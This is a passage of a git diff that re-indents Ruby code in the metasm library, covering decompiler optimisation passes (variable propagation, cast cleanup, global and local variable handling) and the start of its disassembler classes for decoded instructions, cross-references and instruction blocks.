ce.rexpr.to_a.zip(ce.lexpr.type.args.to_a).each { |a, fa| - next if not a.kind_of? C::CExpression or a.op != :& or a.lexpr - next if not fa or not fa.name - rename[a.rexpr, fa.name.sub(/^l?p/, '')] - } - } - (cntrs & cmpi).each { |v| rename[v, 'cntr'] } - end - - # yield each CExpr member (recursive, allows arrays, order: self(!post), lexpr, rexpr, self(post)) - # if given a non-CExpr, walks it until it finds a CExpr to yield - def walk_ce(ce, post=false, &b) - case ce - when C::CExpression - yield ce if not post - walk_ce(ce.lexpr, post, &b) - walk_ce(ce.rexpr, post, &b) - yield ce if post - when ::Array - ce.each { |ce_| walk_ce(ce_, post, &b) } - when C::Statement - case ce - when C::Block; walk_ce(ce.statements, post, &b) - when C::If - walk_ce(ce.test, post, &b) - walk_ce(ce.bthen, post, &b) - walk_ce(ce.belse, post, &b) if ce.belse - when C::While, C::DoWhile - walk_ce(ce.test, post, &b) - walk_ce(ce.body, post, &b) - when C::Return - walk_ce(ce.value, post, &b) if ce.value - end - when C::Declaration - walk_ce(ce.var.initializer, post, &b) if ce.var.initializer - end - nil - end - - # yields each statement (recursive) - def walk(scope, post=false, &b) - case scope - when ::Array; scope.each { |s| walk(s, post, &b) } - when C::Statement - yield scope if not post - case scope - when C::Block; walk(scope.statements, post, &b) - when C::If - yield scope.test - walk(scope.bthen, post, &b) - walk(scope.belse, post, &b) if scope.belse - when C::While, C::DoWhile - yield scope.test - walk(scope.body, post, &b) - when C::Return - yield scope.value - end - yield scope if post - when C::Declaration - walk(scope.var.initializer, post, &b) if scope.var.initializer - end - end - - # forwards to @c_parser, handles cast to Array (these should not happen btw...) - def sizeof(var, type=nil) - var, type = nil, var if var.kind_of? C::Type and not type - type ||= var.type - return @c_parser.typesize[:ptr] if type.kind_of? C::Array and not var.kind_of? C::Variable - @c_parser.sizeof(var, type) rescue -1 - end + next + when 1 # good + break if e.complexity > 10 and ce_.complexity > 3 # try to keep the C readable + # x = 1; y = x; z = x; => cannot suppress x + nr = find_next_read[l_l, n_i+1, v] + break if (nr.kind_of? C::CExpression or nr == :split) and not walk_ce(ce_) { |ce| break true if ce.op == :'=' and ce.lexpr == v } + else break # a = 1; b = a + a => fail + end + + # TODO XXX x = 1; y = x; z = x; + res = walk_ce(ce_, true) { |ce| + case ce.op + when :funcall + if ce.rexpr.to_a.each_with_index { |a,i_| + next if a != v + ce.rexpr[i_] = r + break :done + } == :done + break :done + elsif ce.lexpr == v + ce.lexpr = r + break :done + elsif isfunc + break :fail + end + when *AssignOp + break :fail if not ce.lexpr and depend_vars.include? ce.rexpr # ++depend + if ce.rexpr == v + ce.rexpr = r + break :done + elsif ce.lexpr == v or depend_vars.include? ce.lexpr + break :fail + end + else + break :fail if ce.op == :& and not ce.lexpr and ce.rexpr == v + if ce.lexpr == v + ce.lexpr = r + break :done + elsif ce.rexpr == v + ce_.type = r.type if not ce_.op and ce_.rexpr == v # return (int32)eax + ce.rexpr = r + break :done + end + end + } + case res + when :done + i -= 1 + exprs.delete_at(i) + e.lexpr = e.op = e.rexpr = nil + break + when :fail + break + end + } + # ignore branches that will never reuse v + may_to = g.to_optim[l_l].find_all { |to| find_next_read[to, 0, v].kind_of? C::CExpression } + if may_to.length == 1 and to = may_to.first and to != l_l and g.from_optim[to] == [l_l] + l_i = 0 + l_l = to + else break + end + end + + when nil, :write + # useless assignment (value never read later) + # XXX foo = &bar; bar = 12; baz(*foo) + e.replace(C::CExpression[e.rexpr]) + # remove sideeffectless subexprs + loop do + case e.op + when :funcall, *AssignOp + else + l = (e.lexpr.kind_of? C::CExpression and sideeffect(e.lexpr)) + r = (e.rexpr.kind_of? C::CExpression and sideeffect(e.rexpr)) + if l and r # could split... + elsif l + e.replace(e.lexpr) + next + elsif r + e.replace(e.rexpr) + next + else # remove the assignment altogether + i -= 1 + exprs.delete_at(i) + e.lexpr = e.op = e.rexpr = nil + end + end + break + end + end + end + end + } + + # wipe cexprs marked in the previous step + walk(scope) { |st| + next if not st.kind_of? C::Block + st.statements.delete_if { |e| e.kind_of? C::CExpression and not e.lexpr and not e.op and not e.rexpr } + } + + # reoptimize cexprs + walk_ce(scope, true) { |ce| + # redo some simplification that may become available after variable propagation + # int8 & 255 => int8 + if ce.op == :& and ce.lexpr and ce.lexpr.type.integral? and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == (1 << (8*sizeof(ce.lexpr))) - 1 + ce.replace C::CExpression[ce.lexpr] + end + + # int *ptr; *(ptr + 4) => ptr[4] + if ce.op == :* and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :+ and var = ce.rexpr.lexpr and var.kind_of? C::Variable and var.type.pointer? + ce.lexpr, ce.op, ce.rexpr = ce.rexpr.lexpr, :'[]', ce.rexpr.rexpr + end + + # useless casts + if not ce.op and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and (ce.rexpr.rexpr.kind_of? C::CExpression or + (ce.type.pointer? and ce.rexpr.rexpr == 0 and not ce.type.pointed.untypedef.kind_of? C::Union)) # keep ((struct*)0)->memb + ce.rexpr = ce.rexpr.rexpr + end + if not ce.op and ce.rexpr.kind_of? C::CExpression and (ce.type == ce.rexpr.type or (ce.type.integral? and ce.rexpr.type.integral?)) + ce.replace ce.rexpr + end + # useless casts (type)*((oeua)Ptype) + if not ce.op and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :* and not ce.rexpr.lexpr and ce.rexpr.rexpr.kind_of? C::CExpression and not ce.rexpr.rexpr.op and + p = ce.rexpr.rexpr.rexpr and p.kind_of? C::Typed and p.type.pointer? and ce.type == p.type.pointed + ce.op = ce.rexpr.op + ce.rexpr = ce.rexpr.rexpr.rexpr + end + # (a > 0) != 0 + if ce.op == :'!=' and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 and ce.lexpr.kind_of? C::CExpression and + [:<, :<=, :>, :>=, :'==', :'!=', :'!'].include? ce.lexpr.op + ce.replace ce.lexpr + end + # a == 0 => !a + if ce.op == :== and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 + ce.replace C::CExpression[:'!', ce.lexpr] + end + # !(int)a => !a + if ce.op == :'!' and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? C::CExpression + ce.rexpr = ce.rexpr.rexpr + end + # (int)a < (int)b => a < b TODO uint <-> int + if [:<, :<=, :>, :>=].include? ce.op and ce.rexpr.kind_of? C::CExpression and ce.lexpr.kind_of? C::CExpression and not ce.rexpr.op and not ce.lexpr.op and + ce.rexpr.rexpr.kind_of? C::CExpression and ce.rexpr.rexpr.type.pointer? and ce.lexpr.rexpr.kind_of? C::CExpression and ce.lexpr.rexpr.type.pointer? + ce.rexpr = ce.rexpr.rexpr + ce.lexpr = ce.lexpr.rexpr + end + + # a & 3 & 1 + while (ce.op == :& or ce.op == :|) and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer and + ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == ce.op and ce.lexpr.lexpr and + ce.lexpr.rexpr.kind_of? C::CExpression and ce.lexpr.rexpr.rexpr.kind_of? ::Integer + ce.lexpr, ce.rexpr.rexpr = ce.lexpr.lexpr, ce.lexpr.rexpr.rexpr.send(ce.op, ce.rexpr.rexpr) + end + + # x = x | 4 => x |= 4 + if ce.op == :'=' and ce.rexpr.kind_of? C::CExpression and [:+, :-, :*, :/, :|, :&, :^, :>>, :<<].include? ce.rexpr.op and ce.rexpr.lexpr == ce.lexpr + ce.op = (ce.rexpr.op.to_s + '=').to_sym + ce.rexpr = ce.rexpr.rexpr + end + + # x += 1 => ++x + if (ce.op == :'+=' or ce.op == :'-=') and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 1 + ce.lexpr, ce.op, ce.rexpr = nil, {:'+=' => :'++', :'-=' => :'--'}[ce.op], ce.lexpr + end + + # --x+1 => x-- + if (ce.op == :+ or ce.op == :-) and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == {:+ => :'--', :- => :'++'}[ce.op] and + ce.lexpr.rexpr and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 1 + ce.lexpr, ce.op, ce.rexpr = ce.lexpr.rexpr, ce.lexpr.op, nil + end + } + end + + def remove_unreferenced_vars(scope) + used = {} + walk_ce(scope) { |ce| + # remove unreferenced local vars + used[ce.rexpr.name] = true if ce.rexpr.kind_of? C::Variable + used[ce.lexpr.name] = true if ce.lexpr.kind_of? C::Variable + ce.rexpr.each { |v| used[v.name] = true if v.kind_of? C::Variable } if ce.rexpr.kind_of?(::Array) + } + unused = scope.symbol.keys.find_all { |n| not used[n] } + unused.each { |v| scope.symbol[v].add_attribute 'unused' } # fastcall args need it + scope.statements.delete_if { |sm| sm.kind_of? C::Declaration and unused.include? sm.var.name } + scope.symbol.delete_if { |n, v| unused.include? n } + end + + def finalize + optimize_global + true + end + + def optimize_global + # check all global vars (pointers to global data) + tl = @c_parser.toplevel + vars = tl.symbol.keys.find_all { |k| tl.symbol[k].kind_of? C::Variable and not tl.symbol[k].type.kind_of? C::Function } + countref = Hash.new(0) + + walk_ce(tl) { |ce| + # XXX int foo; void bar() { int foo; } => false negative + countref[ce.rexpr.name] += 1 if ce.rexpr.kind_of? C::Variable + countref[ce.lexpr.name] += 1 if ce.lexpr.kind_of? C::Variable + } + + vars.delete_if { |v| countref[v] == 0 } + countref.delete_if { |k, v| not vars.include? k } + + # by default globals are C::Arrays + # if all references are *foo, dereference the var type + # TODO allow foo to appear (change to &foo) (but still disallow casts/foo+12 etc) + countderef = Hash.new(0) + walk_ce(tl) { |ce| + if ce.op == :* and not ce.lexpr + r = ce.rexpr + elsif ce.op == :'->' + r = C::CExpression[ce.lexpr] + else next + end + # compare type.type cause var is an Array and the cast is a Pointer + countderef[r.rexpr.name] += 1 if r.kind_of? C::CExpression and not r.op and r.rexpr.kind_of? C::Variable and + sizeof(nil, r.type.type) == sizeof(nil, r.rexpr.type.type) rescue nil + } + vars.each { |n| + if countref[n] == countderef[n] + v = tl.symbol[n] + target = C::CExpression[:*, [v]] + v.type = v.type.type + v.initializer = v.initializer.first if v.initializer.kind_of? ::Array + walk_ce(tl) { |ce| + if ce.op == :'->' and C::CExpression[ce.lexpr] == C::CExpression[v] + ce.op = :'.' + elsif ce.lexpr == target + ce.lexpr = v + end + ce.rexpr = v if ce.rexpr == target + ce.lexpr, ce.op, ce.rexpr = nil, nil, v if ce == target + } + end + } + + # if a global var appears only in one function, make it a static variable + tl.statements.each { |st| + next if not st.kind_of? C::Declaration or not st.var.type.kind_of? C::Function or not scope = st.var.initializer + localcountref = Hash.new(0) + walk_ce(scope) { |ce| + localcountref[ce.rexpr.name] += 1 if ce.rexpr.kind_of? C::Variable + localcountref[ce.lexpr.name] += 1 if ce.lexpr.kind_of? C::Variable + } + + vars.delete_if { |n| + next if scope.symbol[n] + next if localcountref[n] != countref[n] + v = tl.symbol.delete(n) + tl.statements.delete_if { |d| d.kind_of? C::Declaration and d.var.name == n } + + if countref[n] == 1 and v.initializer.kind_of? C::CExpression and v.initializer.rexpr.kind_of? String + walk_ce(scope) { |ce| + if ce.rexpr.kind_of? C::Variable and ce.rexpr.name == n + if not ce.op + ce.replace v.initializer + else + ce.rexpr = v.initializer + end + elsif ce.lexpr.kind_of? C::Variable and ce.lexpr.name == n + ce.lexpr = v.initializer + end + } + else + v.storage = :static + scope.symbol[v.name] = v + scope.statements.unshift C::Declaration.new(v) + end + + true + } + } + end + + # reorder statements to put decl first, move assignments to decl, move args to func prototype + def cleanup_var_decl(scope, func) + scope.symbol.each_value { |v| v.type = C::BaseType.new(:int) if v.type.void? } + + args = func.type.args + decl = [] + scope.statements.delete_if { |sm| + next if not sm.kind_of? C::Declaration + if sm.var.stackoff.to_i > 0 and sm.var.name !~ /_a(\d+)$/ # aliased vars: use 1st domain only + args << sm.var + else + decl << sm + end + true + } + + # move trivial affectations to initialiser + # XXX a = 1 ; b = a ; a = 2 + go = true # break from delete_if does not delete.. + scope.statements.delete_if { |st| + if go and st.kind_of? C::CExpression and st.op == :'=' and st.rexpr.kind_of? C::CExpression and not st.rexpr.op and + st.rexpr.rexpr.kind_of? ::Integer and st.lexpr.kind_of? C::Variable and scope.symbol[st.lexpr.name] + st.lexpr.initializer = st.rexpr + else + go = false + end + } + + # reorder declarations + scope.statements[0, 0] = decl.sort_by { |sm| [-sm.var.stackoff.to_i, sm.var.name] } + + # ensure arglist has no hole (create&add unreferenced args) + func.type.args = [] + argoff = @c_parser.typesize[:ptr] + args.sort_by { |sm| sm.stackoff.to_i }.each { |a| + # XXX misalignment ? + if not curoff = a.stackoff + func.type.args << a # __fastcall + next + end + while curoff > argoff + wantarg = C::Variable.new + wantarg.name = scope.decompdata[:stackoff_name][argoff] || stackoff_to_varname(argoff) + wantarg.type = C::BaseType.new(:int) + wantarg.attributes = ['unused'] + func.type.args << wantarg + scope.symbol[wantarg.name] = wantarg + argoff += @c_parser.typesize[:ptr] + end + func.type.args << a + argoff += @c_parser.typesize[:ptr] + } + end + + # rename local variables from subfunc arg names + def rename_variables(scope) + funcs = [] + cntrs = [] + cmpi = [] + + walk_ce(scope) { |ce| + funcs << ce if ce.op == :funcall + cntrs << (ce.lexpr || ce.rexpr) if ce.op == :'++' + cmpi << ce.lexpr if [:<, :>, :<=, :>=, :==, :'!='].include? ce.op and ce.rexpr.kind_of? C::CExpression and ce.rexpr.rexpr.kind_of? ::Integer + } + + rename = lambda { |var, name| + var = var.rexpr if var.kind_of? C::CExpression and not var.op + next if not var.kind_of? C::Variable or not scope.symbol[var.name] or not name + next if (var.name !~ /^(var|arg)_/ and not var.storage == :register) or not scope.symbol[var.name] or name =~ /^(var|arg)_/ + s = scope.symbol_ancestors + n = name + i = 0 + n = name + "#{i+=1}" while s[n] + scope.symbol[n] = scope.symbol.delete(var.name) + var.name = n + } + + funcs.each { |ce| + next if not ce.lexpr.kind_of? C::Variable or not ce.lexpr.type.kind_of? C::Function + ce.rexpr.to_a.zip(ce.lexpr.type.args.to_a).each { |a, fa| rename[a, fa.name] if fa } + } + funcs.each { |ce| + next if not ce.lexpr.kind_of? C::Variable or not ce.lexpr.type.kind_of? C::Function + ce.rexpr.to_a.zip(ce.lexpr.type.args.to_a).each { |a, fa| + next if not a.kind_of? C::CExpression or a.op != :& or a.lexpr + next if not fa or not fa.name + rename[a.rexpr, fa.name.sub(/^l?p/, '')] + } + } + (cntrs & cmpi).each { |v| rename[v, 'cntr'] } + end + + # yield each CExpr member (recursive, allows arrays, order: self(!post), lexpr, rexpr, self(post)) + # if given a non-CExpr, walks it until it finds a CExpr to yield + def walk_ce(ce, post=false, &b) + case ce + when C::CExpression + yield ce if not post + walk_ce(ce.lexpr, post, &b) + walk_ce(ce.rexpr, post, &b) + yield ce if post + when ::Array + ce.each { |ce_| walk_ce(ce_, post, &b) } + when C::Statement + case ce + when C::Block; walk_ce(ce.statements, post, &b) + when C::If + walk_ce(ce.test, post, &b) + walk_ce(ce.bthen, post, &b) + walk_ce(ce.belse, post, &b) if ce.belse + when C::While, C::DoWhile + walk_ce(ce.test, post, &b) + walk_ce(ce.body, post, &b) + when C::Return + walk_ce(ce.value, post, &b) if ce.value + end + when C::Declaration + walk_ce(ce.var.initializer, post, &b) if ce.var.initializer + end + nil + end + + # yields each statement (recursive) + def walk(scope, post=false, &b) + case scope + when ::Array; scope.each { |s| walk(s, post, &b) } + when C::Statement + yield scope if not post + case scope + when C::Block; walk(scope.statements, post, &b) + when C::If + yield scope.test + walk(scope.bthen, post, &b) + walk(scope.belse, post, &b) if scope.belse + when C::While, C::DoWhile + yield scope.test + walk(scope.body, post, &b) + when C::Return + yield scope.value + end + yield scope if post + when C::Declaration + walk(scope.var.initializer, post, &b) if scope.var.initializer + end + end + + # forwards to @c_parser, handles cast to Array (these should not happen btw...) + def sizeof(var, type=nil) + var, type = nil, var if var.kind_of? C::Type and not type + type ||= var.type + return @c_parser.typesize[:ptr] if type.kind_of? C::Array and not var.kind_of? C::Variable + @c_parser.sizeof(var, type) rescue -1 + end end end diff --git a/lib/metasm/metasm/disassemble.rb b/lib/metasm/metasm/disassemble.rb index 5c552f933848c..27e910ede0527 100644 --- a/lib/metasm/metasm/disassemble.rb +++ b/lib/metasm/metasm/disassemble.rb @@ -10,2058 +10,2058 @@ module Metasm # holds information for decoded instructions: the original opcode, a pointer to the InstructionBlock, etc class DecodedInstruction - # the instance of InstructionBlock this di is into - attr_accessor :block - # our offset (in bytes) from the start of the block, used only for hexdump - attr_accessor :block_offset - # the address of the instruction's first byte in memory - attr_accessor :address - # the disassembled data - attr_accessor :instruction, :opcode - # our, length in bytes - attr_accessor :bin_length - # array of arbitrary strings - attr_accessor :comment - # a cache of the binding used by the backtracker to emulate this instruction - attr_accessor :backtrace_binding - - # create a new DecodedInstruction with an Instruction whose cpu is the argument - # can take an existing Instruction as argument - def initialize(arg, addr=nil) - case arg - when Instruction - @instruction = arg - @opcode = @instruction.cpu.opcode_list.find { |op| op.name == @instruction.opname } if @instruction.cpu - else @instruction = Instruction.new(arg) - end - @bin_length = 0 - @address = addr if addr - end - - def next_addr=(a) @next_addr = a end - def next_addr - (@next_addr ||= nil) || (address + @bin_length) if address - end - - def show - if block - bin = @block.edata.data[@block.edata_ptr+@block_offset, @bin_length].unpack('C*').map { |c| '%02x' % c }.join - if @bin_length > 12 - bin = bin[0, 20] + "..<+#{@bin_length-10}>" - end - " #{@instruction.to_s.ljust(44)} ; @#{Expression[address]} #{bin} #{@comment.sort[0,6].join(' ') if comment}" - else - "#{@instruction}#{' ; ' + @comment.join(' ') if comment}" - end - end - - include Renderable - def render - ret = [] - ret << Expression[address] << ' ' if address - ret << @instruction - ret << ' ; ' << @comment if comment - ret - end - - def add_comment(c) - @comment ||= [] - @comment |= [c] - end - - # returns a copy of the DecInstr, with duplicated #instruction ("deep_copy") - def dup - new = super() - new.instruction = @instruction.dup - new - end + # the instance of InstructionBlock this di is into + attr_accessor :block + # our offset (in bytes) from the start of the block, used only for hexdump + attr_accessor :block_offset + # the address of the instruction's first byte in memory + attr_accessor :address + # the disassembled data + attr_accessor :instruction, :opcode + # our, length in bytes + attr_accessor :bin_length + # array of arbitrary strings + attr_accessor :comment + # a cache of the binding used by the backtracker to emulate this instruction + attr_accessor :backtrace_binding + + # create a new DecodedInstruction with an Instruction whose cpu is the argument + # can take an existing Instruction as argument + def initialize(arg, addr=nil) + case arg + when Instruction + @instruction = arg + @opcode = @instruction.cpu.opcode_list.find { |op| op.name == @instruction.opname } if @instruction.cpu + else @instruction = Instruction.new(arg) + end + @bin_length = 0 + @address = addr if addr + end + + def next_addr=(a) @next_addr = a end + def next_addr + (@next_addr ||= nil) || (address + @bin_length) if address + end + + def show + if block + bin = @block.edata.data[@block.edata_ptr+@block_offset, @bin_length].unpack('C*').map { |c| '%02x' % c }.join + if @bin_length > 12 + bin = bin[0, 20] + "..<+#{@bin_length-10}>" + end + " #{@instruction.to_s.ljust(44)} ; @#{Expression[address]} #{bin} #{@comment.sort[0,6].join(' ') if comment}" + else + "#{@instruction}#{' ; ' + @comment.join(' ') if comment}" + end + end + + include Renderable + def render + ret = [] + ret << Expression[address] << ' ' if address + ret << @instruction + ret << ' ; ' << @comment if comment + ret + end + + def add_comment(c) + @comment ||= [] + @comment |= [c] + end + + # returns a copy of the DecInstr, with duplicated #instruction ("deep_copy") + def dup + new = super() + new.instruction = @instruction.dup + new + end end # holds information on a backtracked expression near begin and end of instruction blocks (#backtracked_for) class BacktraceTrace - # address of the instruction in the block from which rebacktrace should start (use with from_subfuncret bool) - # address is nil if the backtrace is from block start - # exclude_instr is a bool saying if the backtrace should start at address or at the preceding instruction - # these are optional: if absent, expr is to be rebacktracked when a new codepath arrives at the beginning of the block - attr_accessor :address, :from_subfuncret, :exclude_instr - # address of the instruction that initiated the backtrace - attr_accessor :origin - # the Expression to backtrace at this point - attr_accessor :expr - # the original backtracked Expression - attr_accessor :orig_expr - # length of r/w xref (in bytes) - attr_accessor :len - # :r/:w/:x - attr_accessor :type - # bool: true if this maps to a :x that should not have a from when resolved - attr_accessor :detached - # maxdepth at the point of the object creation - attr_accessor :maxdepth - - def initialize(expr, origin, orig_expr, type, len=nil, maxdepth=nil) - @expr, @origin, @orig_expr, @type = expr, origin, orig_expr, type - @len = len if len - @maxdepth = maxdepth if maxdepth - end - - def hash ; [origin, expr].hash ; end - def eql?(o) - o.class == self.class and - [ address, from_subfuncret, exclude_instr, origin, orig_expr, len, type, detached] == - [o.address, o.from_subfuncret, o.exclude_instr, o.origin, o.orig_expr, o.len, o.type, o.detached] - end - alias == eql? + # address of the instruction in the block from which rebacktrace should start (use with from_subfuncret bool) + # address is nil if the backtrace is from block start + # exclude_instr is a bool saying if the backtrace should start at address or at the preceding instruction + # these are optional: if absent, expr is to be rebacktracked when a new codepath arrives at the beginning of the block + attr_accessor :address, :from_subfuncret, :exclude_instr + # address of the instruction that initiated the backtrace + attr_accessor :origin + # the Expression to backtrace at this point + attr_accessor :expr + # the original backtracked Expression + attr_accessor :orig_expr + # length of r/w xref (in bytes) + attr_accessor :len + # :r/:w/:x + attr_accessor :type + # bool: true if this maps to a :x that should not have a from when resolved + attr_accessor :detached + # maxdepth at the point of the object creation + attr_accessor :maxdepth + + def initialize(expr, origin, orig_expr, type, len=nil, maxdepth=nil) + @expr, @origin, @orig_expr, @type = expr, origin, orig_expr, type + @len = len if len + @maxdepth = maxdepth if maxdepth + end + + def hash ; [origin, expr].hash ; end + def eql?(o) + o.class == self.class and + [ address, from_subfuncret, exclude_instr, origin, orig_expr, len, type, detached] == + [o.address, o.from_subfuncret, o.exclude_instr, o.origin, o.orig_expr, o.len, o.type, o.detached] + end + alias == eql? end # a cross-reference, tracks read/write/execute memory accesses by decoded instructions class Xref - # :r/:w/:x - attr_accessor :type - # length of r/w (in bytes) - attr_accessor :len - # address of the instruction responsible of the xref - attr_accessor :origin - # XXX list of instructions intervening in the backtrace ? - - def initialize(type, origin, len=nil) - @origin, @type = origin, type - @len = len if len - end - - def hash ; @origin.hash ; end - def eql?(o) o.class == self.class and [type, len, origin] == [o.type, o.len, o.origin] end - alias == eql? + # :r/:w/:x + attr_accessor :type + # length of r/w (in bytes) + attr_accessor :len + # address of the instruction responsible of the xref + attr_accessor :origin + # XXX list of instructions intervening in the backtrace ? + + def initialize(type, origin, len=nil) + @origin, @type = origin, type + @len = len if len + end + + def hash ; @origin.hash ; end + def eql?(o) o.class == self.class and [type, len, origin] == [o.type, o.len, o.origin] end + alias == eql? end # holds a list of contiguous decoded instructions, forming an uninterrupted block (except for eg CPU exceptions) # most attributes are either a value or an array of values, use the associated iterator. class InstructionBlock - # address of the first instruction - attr_accessor :address - # pointer to raw data - attr_accessor :edata, :edata_ptr - # list of DecodedInstructions - attr_accessor :list - # address of instructions giving control directly to us - # includes addr of normal instruction when call flow continues to us past the end of the preceding block - # does not include addresses of subfunction return instructions - # may be nil or an array - attr_accessor :from_normal - # address of instructions called/jumped to - attr_accessor :to_normal - # address of an instruction that calls a subfunction which returns to us - attr_accessor :from_subfuncret - # address of instruction executed after a called subfunction returns - attr_accessor :to_subfuncret - # address of instructions executed indirectly through us (callback in a subfunction, SEH...) - # XXX from_indirect is not populated for now - attr_accessor :from_indirect, :to_indirect - # array of BacktraceTrace - # when a new code path comes to us, it should be backtracked for the values of :r/:w/:x using btt with no address - # for internal use only (block splitting): btt with an address - attr_accessor :backtracked_for - - # create a new InstructionBlock based at address - # also accepts a DecodedInstruction or an Array of them to initialize from - def initialize(arg0, edata=nil, edata_ptr=nil) - @list = [] - case arg0 - when DecodedInstruction - @address = arg0.address - add_di(arg0) - when Array - @address = arg0.first.address if not arg0.empty? - arg0.each { |di| add_di(di) } - else - @address = arg0 - end - edata_ptr ||= edata ? edata.ptr : 0 - @edata, @edata_ptr = edata, edata_ptr - @backtracked_for = [] - end - - def bin_length - (di = @list.last) ? di.block_offset + di.bin_length : 0 - end - - # splits the current block into a new one with all di from address addr to end - # caller is responsible for rebacktracing new.bt_for to regenerate correct old.btt/new.btt - def split(addr) - raise "invalid split @#{Expression[addr]}" if not idx = @list.index(@list.find { |di| di.address == addr }) or idx == 0 - off = @list[idx].block_offset - new_b = self.class.new(addr, @edata, @edata_ptr + off) - new_b.add_di @list.delete_at(idx) while @list[idx] - new_b.to_normal, @to_normal = to_normal, new_b.to_normal - new_b.to_subfuncret, @to_subfuncret = to_subfuncret, new_b.to_subfuncret - new_b.add_from @list.last.address - add_to new_b.address - @backtracked_for.delete_if { |btt| - if btt.address and new_b.list.find { |di| di.address == btt.address } - new_b.backtracked_for << btt - true - end - } - new_b - end - - # adds a decodedinstruction to the block list, updates di.block and di.block_offset - def add_di(di) - di.block = self - di.block_offset = bin_length - di.address ||= @address + di.block_offset - @list << di - end + # address of the first instruction + attr_accessor :address + # pointer to raw data + attr_accessor :edata, :edata_ptr + # list of DecodedInstructions + attr_accessor :list + # address of instructions giving control directly to us + # includes addr of normal instruction when call flow continues to us past the end of the preceding block + # does not include addresses of subfunction return instructions + # may be nil or an array + attr_accessor :from_normal + # address of instructions called/jumped to + attr_accessor :to_normal + # address of an instruction that calls a subfunction which returns to us + attr_accessor :from_subfuncret + # address of instruction executed after a called subfunction returns + attr_accessor :to_subfuncret + # address of instructions executed indirectly through us (callback in a subfunction, SEH...) + # XXX from_indirect is not populated for now + attr_accessor :from_indirect, :to_indirect + # array of BacktraceTrace + # when a new code path comes to us, it should be backtracked for the values of :r/:w/:x using btt with no address + # for internal use only (block splitting): btt with an address + attr_accessor :backtracked_for + + # create a new InstructionBlock based at address + # also accepts a DecodedInstruction or an Array of them to initialize from + def initialize(arg0, edata=nil, edata_ptr=nil) + @list = [] + case arg0 + when DecodedInstruction + @address = arg0.address + add_di(arg0) + when Array + @address = arg0.first.address if not arg0.empty? + arg0.each { |di| add_di(di) } + else + @address = arg0 + end + edata_ptr ||= edata ? edata.ptr : 0 + @edata, @edata_ptr = edata, edata_ptr + @backtracked_for = [] + end + + def bin_length + (di = @list.last) ? di.block_offset + di.bin_length : 0 + end + + # splits the current block into a new one with all di from address addr to end + # caller is responsible for rebacktracing new.bt_for to regenerate correct old.btt/new.btt + def split(addr) + raise "invalid split @#{Expression[addr]}" if not idx = @list.index(@list.find { |di| di.address == addr }) or idx == 0 + off = @list[idx].block_offset + new_b = self.class.new(addr, @edata, @edata_ptr + off) + new_b.add_di @list.delete_at(idx) while @list[idx] + new_b.to_normal, @to_normal = to_normal, new_b.to_normal + new_b.to_subfuncret, @to_subfuncret = to_subfuncret, new_b.to_subfuncret + new_b.add_from @list.last.address + add_to new_b.address + @backtracked_for.delete_if { |btt| + if btt.address and new_b.list.find { |di| di.address == btt.address } + new_b.backtracked_for << btt + true + end + } + new_b + end + + # adds a decodedinstruction to the block list, updates di.block and di.block_offset + def add_di(di) + di.block = self + di.block_offset = bin_length + di.address ||= @address + di.block_offset + @list << di + end end # a factorized subfunction as seen by the disassembler class DecodedFunction - # when backtracking an instruction that calls us, use this binding and then the instruction's - # the binding is lazily filled up for non-external functions, register by register, when - # a backtraced expression depends on it - attr_accessor :backtrace_binding - # same as InstructionBlock#backtracked_for - # includes the expression responsible of the function return (eg [esp] on ia32) - attr_accessor :backtracked_for - # addresses of instruction causing the function to return - attr_accessor :return_address - # a lambda called for dynamic backtrace_binding generation - attr_accessor :btbind_callback - # a lambda called for dynamic backtracked_for - attr_accessor :btfor_callback - # bool, if false the function is actually being disassembled - attr_accessor :finalized - # bool, if true the function does not return (eg exit() or ExitProcess()) - attr_accessor :noreturn - - # if btbind_callback is defined, calls it with args [dasm, binding, funcaddr, calladdr, expr, origin, maxdepth] - # else update lazily the binding from expr.externals, and return backtrace_binding - def get_backtrace_binding(dasm, funcaddr, calladdr, expr, origin, maxdepth) - if btbind_callback - @btbind_callback[dasm, @backtrace_binding, funcaddr, calladdr, expr, origin, maxdepth] - elsif backtrace_binding and dest = @backtrace_binding[:thunk] and target = dasm.function[dest] - target.get_backtrace_binding(dasm, funcaddr, calladdr, expr, origin, maxdepth) - else - unk_regs = expr.externals.grep(Symbol).uniq - @backtrace_binding.keys - [:unknown] - dasm.cpu.backtrace_update_function_binding(dasm, funcaddr, self, return_address, *unk_regs) if not unk_regs.empty? - @backtrace_binding - end - end - - # if btfor_callback is defined, calls it with args [dasm, bt_for, funcaddr, calladdr] - # else return backtracked_for - def get_backtracked_for(dasm, funcaddr, calladdr) - if btfor_callback - @btfor_callback[dasm, @backtracked_for, funcaddr, calladdr] - elsif backtrace_binding and dest = @backtrace_binding[:thunk] and target = dasm.function[dest] - target.get_backtracked_for(dasm, funcaddr, calladdr) - else - @backtracked_for - end - end - - def initialize - @backtracked_for = [] - @backtrace_binding = {} - end + # when backtracking an instruction that calls us, use this binding and then the instruction's + # the binding is lazily filled up for non-external functions, register by register, when + # a backtraced expression depends on it + attr_accessor :backtrace_binding + # same as InstructionBlock#backtracked_for + # includes the expression responsible of the function return (eg [esp] on ia32) + attr_accessor :backtracked_for + # addresses of instruction causing the function to return + attr_accessor :return_address + # a lambda called for dynamic backtrace_binding generation + attr_accessor :btbind_callback + # a lambda called for dynamic backtracked_for + attr_accessor :btfor_callback + # bool, if false the function is actually being disassembled + attr_accessor :finalized + # bool, if true the function does not return (eg exit() or ExitProcess()) + attr_accessor :noreturn + + # if btbind_callback is defined, calls it with args [dasm, binding, funcaddr, calladdr, expr, origin, maxdepth] + # else update lazily the binding from expr.externals, and return backtrace_binding + def get_backtrace_binding(dasm, funcaddr, 